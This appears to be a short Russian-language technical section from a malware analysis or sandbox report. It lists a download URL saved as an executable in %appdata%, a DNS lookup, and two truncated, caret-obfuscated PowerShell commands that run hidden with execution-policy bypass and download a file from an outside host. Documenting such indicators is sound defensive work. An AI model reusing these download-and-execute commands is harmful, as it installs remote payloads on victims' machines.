Техническая информация
- http://newyeargoka.top/read.php?f=0.dat как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "PO^weRSHe^l^l.Ex^e^ -^Exe^cUt^I^O^np^OLi^CY b^yPAsS -NoP^RoFIl^E -w^in^D^OW^St^YlE^ hIDdE^n (n^ew-objeC^T^ SY^stEM.nEt.^W^ebClie^Nt^).^D^OWnLoa^DFiLe('http://newyeargoka.top/...
- DNS ASK ne###argoka.top
- '<SYSTEM32>\cmd.exe' /C "PO^weRSHe^l^l.Ex^e^ -^Exe^cUt^I^O^np^OLi^CY b^yPAsS -NoP^RoFIl^E -w^in^D^OW^St^YlE^ hIDdE^n (n^ew-objeC^T^ SY^stEM.nEt.^W^ebClie^Nt^).^D^OWnLoa^DFiLe('http://newyeargoka.top/...' (со скрытым окном)